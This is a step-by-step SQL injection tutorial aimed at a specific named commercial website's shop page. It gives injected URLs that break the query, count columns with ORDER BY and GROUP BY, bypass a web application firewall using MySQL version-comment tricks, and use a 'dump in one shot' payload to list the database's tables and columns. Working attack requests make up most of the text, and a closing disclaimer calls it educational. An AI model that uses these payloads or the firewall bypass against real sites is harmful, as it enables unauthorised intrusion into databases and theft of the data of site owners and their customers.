Step by Step SQL Injection Attack Tutorial
In this tutorial, we will describe how to use SQL Injection to get some useful information from website.
.gif)
Target Site - http://www.slightergolf.com
Step 1
Break The Query, Let's Do With Single Quote ( ' )
Like This :
Site Generate The Error Like This
(You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)
Step 2
Now Fix The Query, Like This...
http://www.slightergolf.com/products/shop.php?c=misc&id=8' --+
But , Still Error Not Fixed ..!! Now Try This On,
http://www.slightergolf.com/products/shop.php?c=misc&id='8' --+
Now Error Is Fixed ....!!
Step 3
Find Total Column Number's
There Are 3 Types I Know To Find Total Column Number.
Method 1 - ORDER BY
Let's Try,
http://www.slightergolf.com/products/shop.php?c=misc&id='8' order by 100--+
Now Site Is Showing One Error Like This,
(Unknown column '100' in 'order clause')
Now We Are Decrease The Number Like This, Order By 90, Order By 80, Order By 70, Order By 60,...
We Are Decrease Number When Site(Error) Are Is Not Fixed ...!!
In This Case (Site) We Are Geting Fix The Error At "Order By 11"
http://www.slightergolf.com/products/shop.php?c=misc&id='8' order by 11--+
So, It Mean There Are 11 Total Column In This Site...
Method 2 - GROUP BY
Like This,
http://www.slightergolf.com/products/shop.php?c=misc&id='8' GROUP BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
And We Are Geting This Type Error Like This,
(Unknown column '12' in 'group statement')
It Mean There Are Total 11 Columns In Thi Site.
Method 3 - PROCEDURE ANALYSE()
Still Not Work In This Site...
Now We Move On Getting Vulnerable Column Number
Like This,
Step 4
http://www.slightergolf.com/products/shop.php?c=misc&id='8' union select 1,2,3,4,5,6,7,8,9,10,11--+
But Still Fu**ing Firewall ...
Now Try To Bypass This... Like This,
http://www.slightergolf.com/products/shop.php?c=misc&id='8' /!50000union/ select 1,2,3,4,5,6,7,8,9,10,11--+
Now We Have Bypass The Firewall...
But, We Are Not Getting Vulnerable Column Number Here...
Now Try This,
http://www.slightergolf.com/products/shop.php?c=misc&id=-'8' /!50000Union/ Select 1,2,3,4,5,6,7,8,9,10,11--+
Yeah We Are Getting All Vulnerable Column Number
Like This, 5, 8.
Step 5
Now Try Dump All "Database,Tables,Columns" Using DIOS (Dump in One Shot)
Like This,
http://www.slightergolf.com/products/shop.php?c=misc&id=-'8' /!50000Union/ Select 1,2,3,4,/!00000concat/!(0x223e,version(),(Select(@) from (selecT(@:=0x00),(select(0) from (/!information_Schema/.columns) where (table_Schema=database())and(0x00)in(@:=concat/!(@,0x3c62723e,table_name,0x3a3a,column_name))))x))/,6,7,8,9,10,11--+
And We Are Injecting This Site...
Disclaimer: This tutorial is for educational purposes only and is not intended to be put into practise unless you have authorised access to the website you are trying to break into